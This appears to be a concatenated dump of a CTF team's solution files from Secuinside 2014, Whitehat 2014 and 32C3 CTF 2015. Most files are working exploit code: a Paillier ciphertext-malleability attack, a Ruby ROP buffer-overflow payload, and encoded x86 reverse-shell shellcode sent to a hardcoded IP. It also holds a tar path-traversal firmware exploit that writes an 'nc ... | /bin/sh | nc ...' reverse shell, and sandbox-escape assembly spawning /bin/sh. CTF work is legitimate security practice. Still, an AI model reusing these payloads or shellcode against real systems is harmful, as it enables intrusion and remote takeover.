 24 | d[1] = '00100000'
 25 | d[2] = '00110100'
 26 | d[3] = '11111010'
 27 | d[4] = '01000101'
 28 | d[5] = '00010001'
 29 | d[6] = '00111101'
 30 | d[7] = '00000100'
 31 | d[8] = '10011110'
 32 | d[9] = '11010100'
 33 | d[10] = '00010100'
 34 | d[11] = '11011101'
 35 | d[12] = '11010010'
 36 | d[13] = '01010100'
 37 | d[14] = '01001110'
 38 | d[15] = '01011001'
 39 | d[16] = '00001110'
 40 | d[17] = '01010001'
 41 | d[18] = '11011010'
 42 | d[19] = '10010010'
 43 | d[20] = '11010101'
 44 | d[21] = '00011001'
 45 | d[22] = '00010001'
 46 | d[23] = '00001110'
 47 | d[24] = '00010010'
 48 | d[25] = '00011111'
 49 | d[26] = '01000000'
 50 | d = d.slice(1, d.length)
 51 | 
 52 | input = "00100000
 53 | 00110100
 54 | 11111010
 55 | 01000101
 56 | 00010001
 57 | 00111101
 58 | 00000100
 59 | 10011110
 60 | 11010100
 61 | 00010100
 62 | 11011101
 63 | 11010010
 64 | 01010100
 65 | 01001110
 66 | 01011001
 67 | 00001110
 68 | 01010001
 69 | 11011010
 70 | 10010010
 71 | 11010101
 72 | 00011001
 73 | 00010001
 74 | 00001110
 75 | 00010010
 76 | 00011111
 77 | 01000000".split("\n")
 78 | 
 79 | input.length.times do |i|
 80 |   puts "[*] Diff(%d) : %s %s" % [i, d[i], input[i]] if  d[i] != input[i]
 81 | end
 82 | 
 83 | input = input.join
 84 | type = input.slice!(0,4)
 85 | len = input.slice!(0,9).to_i(2)
 86 | encode = input.slice!(0, 11*3)
 87 | dict = ["0", "1", "2", "3", "4", "5", "6", "7", "8", "9"] + ("A".."Z").to_a + [" ","$", "%","*","+","-",".","/", ":"]
 88 | lookup = {}
 89 | 
 90 | dict.length.times do |i|
 91 |   dict.length.times do |j|
 92 |     lookup[45*i + j] = dict[i]+dict[j]
 93 |   end
 94 | end
 95 | encode = encode.scan(/.{11}/).map{|v| v.to_i(2)}
 96 | #input = [564, 1051, 1225, 1333]
 97 | encode = encode.map do |x|
 98 |   lookup[x]
 99 | end
100 | 
101 | type = input.slice!(0,4)
102 | len = input.slice!(0,8).to_i(2)
103 | p encode.join + input.scan(/.{8}/).map{|v| v.to_i(2).chr}.join
104 | 
105 | 
106 | 


--------------------------------------------------------------------------------
/2014/secuinside/crypto/DONE.txt:
--------------------------------------------------------------------------------
 1 | wuninsu@ubuntu:~/secuinside/crypto$ python pillow_reader.py 219.240.37.153 5151 "s3cret"
 2 | Welcome to Pillow Reader. Here are some articles from online.
 3 | 
 4 | 86e05276d3c364cd6157e23cd972e0a662dff9ebf9ade83eae022c292c767bcd6cf528c7f6ae98af2f7811d99c9e45e7e4e6f1b9841aabf89a84dd0673099b61
 5 | Read [flag1]
 6 | The flag is "7h053 wh0 bu1ld b3n347h
 7 | wuninsu@ubuntu:~/secuinside/crypto$ fg
 8 | vim pillow_reader.py
 9 | 
10 | [1]+  Stopped                 vim pillow_reader.py
11 | wuninsu@ubuntu:~/secuinside/crypto$ python pillow_reader.py 219.240.37.153 5151 "s3cret"
12 | Welcome to Pillow Reader. Here are some articles from online.
13 | 
14 | 86e05276d3c364cd6157e23cd972e0a662dff9ebf9ade83eae022c292c767bcd6cf528c7f6ae98af2f7811d99c9e45e7e4e6f1b9841aabf89a84dd0673099b61
15 | Read [flag2]
16 |  7h3 574r5 bu1ld 700 l0w."(without quote)
17 | 
18 | /*****
19 | Using unwind disassembpler
20 | *****/
21 | 


--------------------------------------------------------------------------------
/2014/secuinside/crypto/PKI.py:
--------------------------------------------------------------------------------
 1 | import math 
 2 | #from PrimeUtils import PrimeUtils
 3 | from Crypto.Util import number
 4 | 
 5 | class PrivKey:
 6 | 	def __init__(self, p, q, n):
 7 | 		self.p = p
 8 | 		self.q = q
 9 | 		self.n = n
10 | 		self.l = (p-1)*(q-1)
11 | 		#self.m = PrimeUtils.modinv(self.l, self.n)
12 | 		self.m = number.inverse(self.l, self.n)
13 | 
14 | class PubKey:
15 | 	def __init__(self, n):
16 | 		self.n = n
17 | 		self.n_sq = n * n
18 | 		self.g = n + 1
19 | 
20 | class PKI:
21 | 	def __init__(self, pubkey = None, privkey = None):
22 | 		if pubkey != None:
23 | 			self.pubkey = pubkey
24 | 			self.privkey = privkey
25 | 		else:
26 | 			(self.pubkey, self.privkey) = self.gen_keypair(512)
27 | 
28 | 		self.r = None
29 | 
30 | 	def encrypt(self, plain):
31 | 		if self.pubkey == None:
32 | 			assert AssertionError, 'Public key must be exist'
33 | 			raise
34 | 		
35 | 		pubkey = self.pubkey
36 | 		while True:
37 | 			r = number.getPrime(int(round(math.log(pubkey.n, 2))))
38 | 			if not r > 0:
39 | 				continue
40 | 
41 | 			if r > pubkey.n:
42 | 				continue
43 | 			break
44 | 
45 | 		cipher = pow(pubkey.g, plain, pubkey.n_sq) * pow(r, pubkey.n, pubkey.n_sq) % pubkey.n_sq
46 | 		return cipher
47 | 
48 | 	def decrypt(self, cipher):
49 | 		if self.privkey is None:
50 | 			assert AssertionError, 'Private key must be exist'
51 | 			raise
52 | 	
53 | 		if self.pubkey is None:
54 | 			assert AssertionError, 'PubKey key must be exist'
55 | 			raise
56 | 
57 | 		privkey = self.privkey
58 | 		pubkey = self.pubkey
59 | 		
60 | 		plain = (privkey.m * ((pow(cipher, privkey.l, pubkey.n_sq) - 1) // pubkey.n)) % pubkey.n
61 | 		return plain
62 | 
63 | 	def gen_keypair(self, bits):
64 | 		#p = PrimeUtils.get_prime(bits//2)
65 | 		p = number.getPrime(bits//2)
66 | 		#q = PrimeUtils.get_prime(bits//2)
67 | 		q = number.getPrime(bits//2)
68 | 
69 | 
70 | 		n = p*q
71 | 		return (PubKey(n), PrivKey(p,q,n))
72 | 


--------------------------------------------------------------------------------
/2014/secuinside/crypto/pillow_reader.py:
--------------------------------------------------------------------------------
 1 | import socket, struct, sys, binascii, PKI
 2 | from PKI import PubKey, PrivKey, PKI
 3 | 
 4 | g_guestkey = '\xe1\xe7\xac\xa9\x19c\x0c\xf0'
 5 | g_pki_client = PKI()
 6 | g_pki_server = PKI()
 7 | s = None  
 8 | with_encryption = False
 9 | 
10 | def s2i(s):
11 | 	return int(s.encode("hex"),16)
12 | 
13 | def i2s(s):
14 | 	s = hex(s)[2:]
15 | 	if (s[-1] == "L"):
16 | 		s = s[:-1]
17 | 	if len(s) % 2 == 1:
18 | 		s = "0" + s
19 | 	return s.decode("hex")
20 | 
21 | def create_socket(host, port):
22 | 	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
23 | 	s.connect((host, port))
24 | 	return s
25 | 
26 | def exchange_key():
27 | 	global with_encryption
28 | 	print s.recv(1024)
29 | 	write(hex(g_pki_client.pubkey.n))
30 | 	data = read()[2:]
31 | 	data = data[:-1]
32 | 	print data
33 | 	n = int(data, 16)
34 | 	with_encryption = True
35 | 	return PubKey(n)
36 | 
37 | def write(data, exploit = False):
38 | 	global with_encryption
39 | 	if with_encryption and not exploit:
40 | 		data = i2s(g_pki_server.encrypt(s2i(data)))
41 | 
42 | 	size = struct.pack('<I', len(data))
43 | 	send_data = size + data
44 | 	s.send(send_data)
45 | 
46 | def read():
47 | 	size_str = s.recv(4)
48 | 	size_str = struct.unpack('<I', size_str)[0]
49 | 	data = s.recv(size_str)
50 | 
51 | 
52 | 	if with_encryption:
53 | 		data_int = s2i(data)
54 | 		data = i2s(g_pki_client.decrypt(data_int))
55 | 	return data
56 | 
57 | def read_files(filenames, authkey):
58 | 	cmd = 'cat '
59 | 	for filename in filenames:
60 | 		cmd += filename + ' '
61 | 
62 | 	cmd = cmd.rstrip() + "\n"
63 | 	write(authkey + cmd)
64 | 	res = ''
65 | 	for _ in range(len(filenames)):
66 | 		res += read()
67 | 	return res
68 | 
69 | def exploit():
70 | 	n = 0x86e05276d3c364cd6157e23cd972e0a662dff9ebf9ade83eae022c292c767bcd6cf528c7f6ae98af2f7811d99c9e45e7e4e6f1b9841aabf89a84dd0673099b61L
71 | 	secret = s2i("\x1f\x59\x85\x6d\xbb\xbe\x90\x99\x5c\xf9\x49\x75\xaf\xd9\x4d\xcf\x46\xbf\x2d\x16\xd8\xb8\xa3\x75\x46\x85\xd3\xeb\x37\x65\xd6\x91\x84\x62\x37\x8a\x2f\x7e\x94\x81\x82\xe8\x4a\x85\x7a\x25\xbe\x05\x7a\x12\x2e\x9d\x65\xe3\x2f\xb0\x1a\x98\x4f\x44\x2e\x78\x1f\xa0\x2e\x8a\x4d\x27\x28\xb1\xa4\xc3\xea\x39\x05\xaa\x95\xab\x9f\xba\x7b\x7d\xfa\x3b\x39\x11\x6d\x49\xc1\x0d\x16\x17\x25\xaa\x0b\xee\xac\x18\xb7\xa2\xa9\xc9\xd5\x5a\x0b\xf6\xf1\xa2\xb2\xca\x90\x3e\xb1\x50\x86\x99\x5b\x2f\x77\xd7\x7d\x3f\x01\x67\x87\x08\xee\x60")
72 | 	plain1 = s2i("secret\n")
73 | 	plain2 = s2i("flag2\n\n")
74 | 	new_plain = i2s((secret + ((plain2 - plain1) * ((secret * n) % (n*n)))) % (n*n))
75 | 	write(new_plain, True)
76 | 
77 | 	res = ''
78 | 	res = read()
79 | 	return res
80 | 
81 | if (len(sys.argv) < 4):
82 | 	print "Argument is too short"
83 | 	exit(-1)
84 | 
85 | host = sys.argv[1]	
86 | port = int(sys.argv[2])
87 | filename = sys.argv[3]
88 | 
89 | if (len(sys.argv) >= 5):
90 | 	key = sys.argv[4]
91 | else:
92 | 	key = g_guestkey
93 | 
94 | s = create_socket(host, port)
95 | g_pki_server = PKI(exchange_key())
96 | print exploit()
97 | 
98 | 


--------------------------------------------------------------------------------
/2014/secuinside/notes/exploit.rb:
--------------------------------------------------------------------------------
  1 | require 'socket'
  2 | require 'securerandom'
  3 | 
  4 | class Exploit 
  5 | 	def initialize
  6 | 		@s = TCPSocket.new('localhost', 4880)
  7 | 
  8 | 		Thread.new do
  9 | 			loop { print @s.read(1) }
 10 | 			
 11 | 		end
 12 | 	end
 13 | 	
 14 | 	def read_banner
 15 | 		3.times { puts @s.readline }
 16 | 	end	
 17 | 
 18 | 	def read_command cmd_count
 19 | 		(4+cmd_count).times { puts @s.readline }
 20 | 		puts @s.read(2)	
 21 | 	end
 22 | 
 23 | 	def login
 24 | 		@s.write("login iuwuninsu\n")
 25 | 		puts @s.read("password: ".length)
 26 | 		@s.write("iuwuninsu\n")
 27 | 		1.times { puts @s.readline }
 28 | 	end
 29 | 
 30 | 	def write data
 31 | 		@s.write("write attack\n")
 32 | 		@s.write(data + "<<<\n")
 33 | 	end
 34 | 
 35 | 	def read
 36 | 		@s.write("read attack\n")
 37 | 	end
 38 | 
 39 | 	def send_yes
 40 | 		sleep(0.1)
 41 | 		@s.write("y\n")
 42 | 	end
 43 | 
 44 | 	def close_write
 45 | 		@s.close_write
 46 | 		#@s.write("")
 47 | 	end
 48 | 
 49 | 	def send_command
 50 | 		@s.write("ls\n")
 51 | 	end
 52 | 
 53 | end
 54 | e = Exploit.new
 55 | e.login
 56 | e.write "a" * 200
 57 | e.read
 58 | e.send_yes
 59 | e.read
 60 | readline
 61 | sleep(1)
 62 | 
 63 | e2 = Exploit.new
 64 | e2.login
 65 | sleep(0.1)
 66 | 
 67 | 
 68 | login = 0x08049A48
 69 | ret = 0x08048FA2 
 70 | #strcpy = 0x08048700
 71 | sprintf = 0x080487E0
 72 | ppr = 0x080491BB 
 73 | dest = 0x0804C428 
 74 | shellcode = [0x8048810,0x8048daf,0x8048f52,0x804861f,0x8048614,0x8048ec6,0x8048614,0x8049964,0x804861a,0x8048813,0x8048814,0x80490c8,0x8048832,0x8049f54,0x80488c0,0x80493f0,0x8048dbd,0x80490c8,0x804984a,0x8049f54,0x80488c0,0x80497da,0x8048903,0x8048d60,0x80487c2,0x8049141,0x804885b,0x804861a,0x8048eba,0x80487c2,0x804861a,0x804861b,0x804c0d5,0x8048792,0x8048813,0x8048814,0x80490c8,0x8048832,0x8048762,0x8048825,0x8048614,0x8049639,0x80489a3,0x8048813,0x8048814,0x8049f54,0x80488c0,0x804881a,0x80487c2,0x80493da,0x80493da,0x0804905E,0x80487c2,0x80487c2,0x80493da,0x8049856,0x8048971,0x80497b2,0x8048813,0x804861f,0x804881a,0x8048614,0x8048813,0x8048814,0x80490c8,0x8048c6e,0x8049f54,0x80488c0]
 75 | 
 76 | payload = [login-0x38].pack('<I') * 69 + [0x80808080].pack('<I') 
 77 | payload += [ret].pack('<I') * 50
 78 | 
 79 | shellcode.each do |byte|
 80 | 	payload += [sprintf, ppr, dest, byte].pack('<I*')
 81 | 	dest += 1
 82 | end
 83 | 
 84 | payload += [dest- shellcode.length].pack('<I*') # return address
 85 | =begin
 86 | libc_start_main = 0x08048752
 87 | payload = [libc_start_main-0x38].pack('<I') * 69 + [0x80808080].pack('<I')
 88 | payload += [0x41414141].pack('<I') * 100
 89 | 
 90 | print "[*] payload length : %d" % payload.length
 91 | =end
 92 | payload = payload.ljust(4090)
 93 | 
 94 | e2.write payload
 95 | 
 96 | STDIN.readline
 97 | e.close_write
 98 | e.send_command
 99 | sleep(10)
100 | 


--------------------------------------------------------------------------------
/2014/secuinside/shellcode/Crc32.h:
--------------------------------------------------------------------------------
 1 | //////////////////////////////////////////////////////////////////////////////
 2 | //
 3 | // Copyright (C) 2003-2010 Daniel Vik
 4 | //
 5 | // This program is free software; you can redistribute it and/or modify
 6 | // it under the terms of the GNU General Public License as published by
 7 | // the Free Software Foundation; either version 2 of the License, or
 8 | // (at your option) any later version.
 9 | // 
10 | // This program is distributed in the hope that it will be useful,
11 | // but WITHOUT ANY WARRANTY; without even the implied warranty of
12 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
13 | // GNU General Public License for more details.
14 | //
15 | // You should have received a copy of the GNU General Public License
16 | // along with this program; if not, write to the Free Software
17 | // Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
18 | //
19 | //////////////////////////////////////////////////////////////////////////////
20 | 
21 | #ifndef CRC32_H
22 | #define CRC32_H
23 | 
24 | typedef unsigned char UInt8;
25 | typedef unsigned int UInt32;
26 | 
27 | class Crc32
28 | {
29 | public:
30 |     Crc32();
31 |     ~Crc32();
32 | 
33 |     // Calculate CRC tables based on a polynomial. (Default values for the
34 |     // tables are provided in the implementation. They are based on the 
35 |     // polynomial 0x04c11db7, used in e.g. PKZip, WinZip and Ethernet.
36 |     static void CalculateTables(UInt32 polynomial = 0x04c11db7);
37 | 
38 |     // Add data to CRC
39 |     void append(UInt8 value);
40 |     void append(const void* buffer, UInt32 size);
41 |     
42 |     // Find reverse CRC patch
43 |     const UInt8* findReverse(UInt32 desiredCrc) const;
44 |     
45 |     // Find reverse CRC patch
46 |     const char* findReverseAscii(UInt32 desiredCrc) const;
47 | 
48 |     // Accessor methods
49 |     void set(UInt32 crc);
50 |     UInt32 get() const;
51 | 
52 | private:
53 |     static UInt32 Reflect(UInt32 value, int count);
54 | 
55 |     static UInt32 crc32Table[256];
56 |     static int reverseCrc32Table[256];
57 |     
58 |     static UInt8 patchBytes[4];
59 |     static char patchChars[7];
60 | 
61 |     UInt32 crc_;
62 |     
63 |     // Not implemented
64 |     void operator=(const Crc32&);
65 |     Crc32(const Crc32&);
66 | };
67 | 
68 | 
69 | #endif /*CRC_H*/
70 | 


--------------------------------------------------------------------------------
/2014/secuinside/shellcode/ReverseCRC.cpp:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include "Crc32.h"
 3 | #include <stdlib.h>
 4 | 
 5 | void testOne(UInt32 startCrc, UInt32 wantedCrc)
 6 | {
 7 |     Crc32 crc;
 8 |     
 9 |     crc.set(startCrc);
10 | 
11 |     const UInt8* patch = crc.findReverse(wantedCrc);
12 |     crc.append(patch, 4);
13 | 
14 |     printf("    initial: 0x%.8x %s -  bytes to add: { 0x%.2x, 0x%.2x, 0x%.2x, 0x%.2x }\n", 
15 |            startCrc, (wantedCrc == crc.get() ? "OK  " : "FAIL"),
16 |            patch[0], patch[1], patch[2], patch[3]);
17 | }
18 | 
19 | void testMany(UInt32 wantedCrc, UInt32 count)
20 | {
21 |     UInt32 startCrc = 7;
22 | 
23 |     printf("\n\nCRC Test - Wanted output: 0x%.8x\n\n", wantedCrc);
24 |     for (UInt32 i = 0; i < count; ++i) {
25 |         testOne(startCrc, wantedCrc);
26 |         startCrc *= 51;
27 |     }
28 | }
29 | 
30 | void testOneAscii(UInt32 startCrc, UInt32 wantedCrc)
31 | {
32 |     Crc32 crc;
33 |     
34 |     crc.set(startCrc);
35 | 
36 |     const char* patch = crc.findReverseAscii(wantedCrc);
37 |     crc.append(patch, 6);
38 | 
39 |     printf("    initial: 0x%.8x %s -  string to add: %s\n",  
40 |            startCrc, (wantedCrc == crc.get() ? "OK  " : "FAIL"), patch);
41 | }
42 | 
43 | void testManyAscii(UInt32 wantedCrc, UInt32 count)
44 | {
45 |     UInt32 startCrc = 7;
46 | 
47 |     printf("\n\nCRC Test ASCII - Wanted output: 0x%.8x\n\n", wantedCrc);
48 |     for (UInt32 i = 0; i < count; ++i) {
49 |         testOneAscii(startCrc, wantedCrc);
50 |         startCrc *= 51;
51 |     }
52 | }
53 | int main(int argc, char** argv)
54 | {
55 | 	char   *ptr;
56 | 	long    value;
57 | 
58 | 	Crc32 crc;
59 | 	UInt32 start = strtoul( argv[1], &ptr, 16);
60 | 	UInt32 target = strtoul( argv[2], &ptr, 16);
61 | 
62 | 	crc.set(start);
63 | 	const UInt8* patch = crc.findReverse(target);
64 | 
65 | 	crc.append(patch, 4);
66 | 
67 | 	int i;
68 | 	for(i =0; i < 4; i ++)
69 | 		printf("%02x", patch[i]);
70 | 
71 | 
72 |     return 0;
73 | }
74 | 


--------------------------------------------------------------------------------
/2014/secuinside/shellcode/exploit.rb:
--------------------------------------------------------------------------------
 1 | require 'socket'
 2 | require 'zlib'
 3 | #encoding: BINARY
 4 | #shellcode = "\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80\xeb\xfe"
 5 | shellcode = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\x8f\xf8\x02\x4f\x68\x02\x00\x1f\x90\x89\xe1\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1\xcd\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80"
 6 | shellcode += "\x00" * (4 - shellcode.length % 4)
 7 | shellcode = shellcode.unpack('<I*')
 8 | 
 9 | #s = TCPSocket.new('localhost', 5757)
10 | s = TCPSocket.new('54.178.232.195', 5757)
11 | random = s.readline()[6..-2]
12 | puts "salt : " + random
13 | salt =  random.scan(/../).map{|v| v.to_i(16).chr}.join
14 | start_crc = Zlib::crc32(salt).to_s(16)
15 | 
16 | Thread.new do |x|
17 | 	loop do 
18 | 		puts s.readline()
19 | 	end
20 | end
21 | 
22 | data = ""
23 | 
24 | length = shellcode.length
25 | s.write([length].pack('<I'))
26 | 
27 | shellcode.each do |x|
28 | 	x = `./ReverseCRC #{start_crc} #{x.to_s(16)}`
29 | 	s.write("\x04\x00\x00\x00")
30 | 	data = x.scan(/../).map{|v| v.to_i(16).chr}.join
31 | 	s.write(data)
32 | end
33 | 
34 | s.puts("nc 0.0.0.0 8080")
35 | sleep(10)
36 | 


--------------------------------------------------------------------------------
/2014/whitehat/ransomware/solve.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <stdint.h>
 3 | 
 4 | typedef struct _RNG
 5 | {
 6 |     uint64_t a;
 7 |     uint64_t c;
 8 |     uint64_t x;
 9 |     uint64_t mod;
10 | } RNG;
11 | 
12 | void init_rng(RNG* r, uint64_t a, uint64_t c, uint64_t x)
13 | {
14 |     r->a = a;
15 |     r->c = c;
16 |     r->x = x;
17 |     r->mod = 0x100000000;
18 | }
19 | 
20 | unsigned char next_rng(RNG* r)
21 | {
22 |     r->x = (r->x * r->a + r->c) % r->mod;
23 |     return (r->x) >> 31;
24 | }
25 | 
26 | unsigned char next_byte(RNG* rng)
27 | {
28 |     
29 |     int i, j ;
30 |     char ret = 0, val;
31 |     for (i = 0; i < 8; i++)
32 |     {
33 |         val = 0;
34 |         for (j = 0; j < 4; j ++)
35 |         {
36 |             val += next_rng(&rng[j]);
37 |         }
38 |         val %= 2;
39 |         ret |= val << i;
40 |     }
41 |     return ret;
42 | }
43 | 
44 | int main()
45 | {
46 |     RNG rng[4];
47 |     uint32_t i, j, brute = 0;
48 |     for (brute = 0; brute < 0xffffffff; brute++)
49 |     {
50 |         init_rng(&rng[0], 94321211, 1013904217, brute & 0xff);
51 |         init_rng(&rng[1], 34321229, 1010101011, (brute >> 8) & 0xff);
52 |         init_rng(&rng[2], 14321233,  987654321, (brute >> 16) & 0xff);
53 |         init_rng(&rng[3], 32452843,  982451653, (brute >> 24) & 0xff);
54 | 
55 |         for (i = 0; i < 100; i ++)
56 |         {
57 |             for (j = 0; j < 4; j++)
58 |                 next_rng(&rng[j]);
59 |         }
60 | 
61 |         if (next_byte(rng) == (0x89 ^ 0xb1) &&
62 |                 next_byte(rng) == (0x1d ^ 0x50) &&
63 |                 next_byte(rng) == (0xd6 ^ 0x4e) &&
64 |                 next_byte(rng) == (0xcf ^ 0x47))
65 |         {
66 |             printf("FOUND : %08x\n", brute);
67 |         }
68 |     }
69 | }
70 | 
71 | 


--------------------------------------------------------------------------------
/2015/32c3-ctf/flash/solve.py:
--------------------------------------------------------------------------------
 1 | import os
 2 | import tarfile
 3 | EXPLOIT = "exploit.sh"
 4 | SERVER = os.environ['SERVER']
 5 | 
 6 | def change_bit(info):
 7 |     info.mode = int('0100775', 8)
 8 |     return info
 9 | 
10 | with open(EXPLOIT, "w") as f:
11 |     f.write("#!/bin/bash\n")
12 |     f.write("nc %s 8080|/bin/sh|nc %s 8081" % (SERVER, SERVER))
13 | 
14 | os.system("cp ../firmware.bin ./firmware.bin")
15 | tar = tarfile.open("firmware.bin", "a")
16 | for name in ["exploit.sh"]:
17 |     tar.add(name, arcname="./signature/../install", filter=change_bit)
18 | tar.close()
19 | 


--------------------------------------------------------------------------------
/2015/32c3-ctf/readme/solve.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python2
 2 | import sys
 3 | import struct
 4 | from socket import *
 5 | 
 6 | ADDR = ('136.243.194.62', 1024)
 7 | 
 8 | def p64(n):
 9 | 	return struct.pack('<Q', n)
10 | 
11 | if __name__ == '__main__':
12 | 	s = create_connection(ADDR)
13 | 	f = s.makefile(bufsize=0)
14 | 	print (f.readline())
15 | 	print (f.read(len("What's your name? ")))
16 | 	another_addr = 0x400d20
17 | 	f.write(p64(another_addr) * 70 + p64(0x600D20) * 70 + "\n")
18 | 	print (f.readline())
19 | 	print (f.read(len("Please overwrite the flag: ")))
20 | 	f.write("LIBC_FATAL_STDERR_=1")
21 | 	f.write("\n")
22 | 	print (f.readline())
23 | 
24 | 	while True:
25 | 		c = f.read(1)
26 | 		if not c: break
27 | 		sys.stdout.write(c)
28 | 


--------------------------------------------------------------------------------
/2015/32c3-ctf/sandbox/.gitignore:
--------------------------------------------------------------------------------
1 | shellcode.o
2 | shellcode
3 | 


--------------------------------------------------------------------------------
/2015/32c3-ctf/sandbox/shellcode.S:
--------------------------------------------------------------------------------
  1 | %define PATH '/proc/self/mem', 0x00
  2 | %define PATH_LEN 100
  3 | %define RETVAL 0x603138
  4 | %define BUF_SIZE 0x100
  5 | %define SANDBOX_ARG 0x603158
  6 | %define SANDBOX_TO_LAUNCHER 0x603134
  7 | %define PIPE 0x603858
  8 | %define FD 10
  9 | 
 10 | global _start
 11 | _start:
 12 |   jmp string
 13 | 
 14 | send_to_sandbox:
 15 |   sub rsp, 0x100
 16 |   mov qword rax, 1
 17 |   mov qword rdi, [0x603148] ; request_fd
 18 |   mov qword rsi, rsp
 19 |   mov qword rdx, 1 ; one byte
 20 |   syscall ; run
 21 |   add rsp, 0x100
 22 |   ret
 23 | 
 24 | send_to_launcher:
 25 |   sub rsp, 0x100
 26 |   mov qword rax, 1
 27 |   mov qword rdi, [PIPE + 4] ; request_fd
 28 |   mov qword rsi, rsp
 29 |   mov qword rdx, 1 ; one byte
 30 |   syscall ; run
 31 |   add rsp, 0x100
 32 |   ret
 33 | 
 34 | recv_from_sandbox:
 35 |   sub rsp, 0x100
 36 |   mov qword rax, 0
 37 |   mov qword rdi, FD
 38 |   mov qword rsi, rsp
 39 |   mov qword rdx, 1 ; one byte
 40 |   syscall ; run
 41 |   add rsp, 0x100
 42 |   ret 
 43 | 
 44 | recv_from_launcher:
 45 |   sub rsp, 0x100
 46 |   mov qword rax, 0
 47 |   mov qword rdi, [0x603130] ; response_fd
 48 |   mov qword rsi, rsp
 49 |   mov qword rdx, 1
 50 |   syscall ; wait until finished
 51 |   add rsp, 0x100
 52 |   ret
 53 | 
 54 | send_request:
 55 |   call send_to_sandbox
 56 |   call recv_from_launcher
 57 |   ret
 58 | 
 59 | get_shellcode_addr:
 60 |   call shellcode
 61 |   shellcode:
 62 |   pop rax
 63 |   add rax, 4
 64 |   ret
 65 |   inc rbx
 66 |   inc rbx
 67 |   inc rbx
 68 |   inc rbx
 69 | 
 70 |   mov rsp, [SANDBOX_ARG]
 71 |   add rsp, 0x800
 72 |   mov rax, 59
 73 |   mov qword rdi, 0x0068732f6e69622f ; /bin/sh
 74 |   push rdi
 75 |   mov rdi, rsp
 76 |   mov rsi, 0
 77 |   mov rdx, 0
 78 |   syscall
 79 | 
 80 | start:
 81 |   pop r8; save string name
 82 |   sub rsp, 0x2000 ; need stack
 83 | 
 84 |   ; create pipe
 85 |   mov rax, [SANDBOX_ARG] ; sandbox_arg
 86 |   mov qword [rax], 22
 87 |   mov qword [rax + 8], PIPE
 88 |   call send_request
 89 | 
 90 |   ; dup2(x, FD)
 91 |   mov rax, [SANDBOX_ARG]
 92 |   mov qword [rax], 33
 93 |   mov qword rdi, [SANDBOX_TO_LAUNCHER]
 94 |   mov qword [rax + 8], rdi 
 95 |   mov qword rdi, FD 
 96 |   mov qword [rax + 16], rdi
 97 |   call send_request
 98 | 
 99 |   ; dup2(rpipe, x)
100 |   mov rax, [SANDBOX_ARG]
101 |   mov qword [rax], 33
102 |   mov rdi, [PIPE]
103 |   mov qword [rax + 8], rdi
104 |   mov rdi, [SANDBOX_TO_LAUNCHER]
105 |   mov qword [rax + 16], rdi
106 |   call send_request
107 | 
108 |   ; copy '/' * 4040
109 |   mov qword rcx, 0
110 |   mov rax, [SANDBOX_ARG]
111 |   lea rax, [rax + 24]
112 | copy_slash:
113 |   mov byte [rax + rcx], 0x2f
114 |   inc rcx
115 |   cmp rcx, 4040
116 |   jl copy_slash
117 |   mov byte [rax + rcx], 0
118 | 
119 | ; call open
120 |   mov qword rax, [SANDBOX_ARG]
121 |   mov qword [rax], 2
122 |   lea rdi, [rax + 24]
123 |   mov [rax + 8], rdi
124 |   mov qword [rax + 16], 1 ; 
125 |   call send_to_sandbox
126 |   call recv_from_sandbox
127 | 
128 |   ; copy path
129 |   mov qword rcx, 0
130 |   mov rax, [SANDBOX_ARG]
131 | copy_path:
132 |   mov byte bl, [r8 + rcx]
133 |   mov byte [rax + rcx], bl
134 |   inc rcx
135 |   cmp rcx, PATH_LEN
136 |   jl copy_path
137 | 
138 |   call send_to_launcher
139 |   call recv_from_launcher
140 | 
141 |   mov qword rdi, [RETVAL] 
142 |   call get_shellcode_addr 
143 |   mov rsi, rax ; save shellcode addr
144 | 
145 |   mov qword rax, [SANDBOX_ARG]
146 |   mov qword [rax], 18
147 |   mov qword [rax + 8], rdi
148 |   mov qword [rax + 16], rsi
149 |   mov qword [rax + 24], BUF_SIZE
150 |   mov qword [rax + 32], 0x401657
151 |   call send_to_sandbox
152 |   call recv_from_sandbox
153 |   call send_to_launcher
154 |   call recv_from_launcher
155 |   
156 | string:
157 |   call start
158 |   db  PATH
159 |   
160 | 


--------------------------------------------------------------------------------
/2015/32c3-ctf/sandbox/solve.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python2
 2 | import commands
 3 | import os
 4 | import telnetlib
 5 | 
 6 | from socket import *
 7 | import struct
 8 | import sys
 9 | 
10 | def p64(n):
11 |     return struct.pack('<Q', n)
12 | def up64(s):
13 |     return struct.unpack('<Q', s)[0]
14 | 
15 | def build(name):
16 |     source = "%s.S" % name
17 |     obj = "%s.o" % name
18 |     os.system("nasm -felf64 %s -o %s" % (source, obj))
19 |     os.system("ld -s -o %s %s" % (name, obj))
20 |     lines = commands.getoutput("objdump -D %s" % name).splitlines()
21 | 
22 |     while True:
23 |         line = lines.pop(0)
24 |         if ("<.text>") in line:
25 |             break
26 | 
27 |     if "..." in lines[-1]:
28 |         lines[-1] = "\t00\t"
29 | 
30 |     return ''.join(map(lambda line: line.split("\t")[1].replace(" ", ""), lines))
31 | 
32 | #ADDR = ('localhost', 1234)
33 | ADDR = ('136.243.194.42', 1024)
34 | if __name__ == '__main__':
35 |     sc = (build("shellcode") + "90" * 8).decode("hex")
36 | 
37 |     s = create_connection(ADDR)
38 |     f = s.makefile(bufsize = 0)
39 |     print (f.readline()),
40 |     f.write(sc)
41 | 
42 |     tn = telnetlib.Telnet()
43 |     tn.sock = s
44 |     tn.interact()
45 | 


--------------------------------------------------------------------------------
/2015/32c3-ctf/teufel/solve.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python2
 2 | 
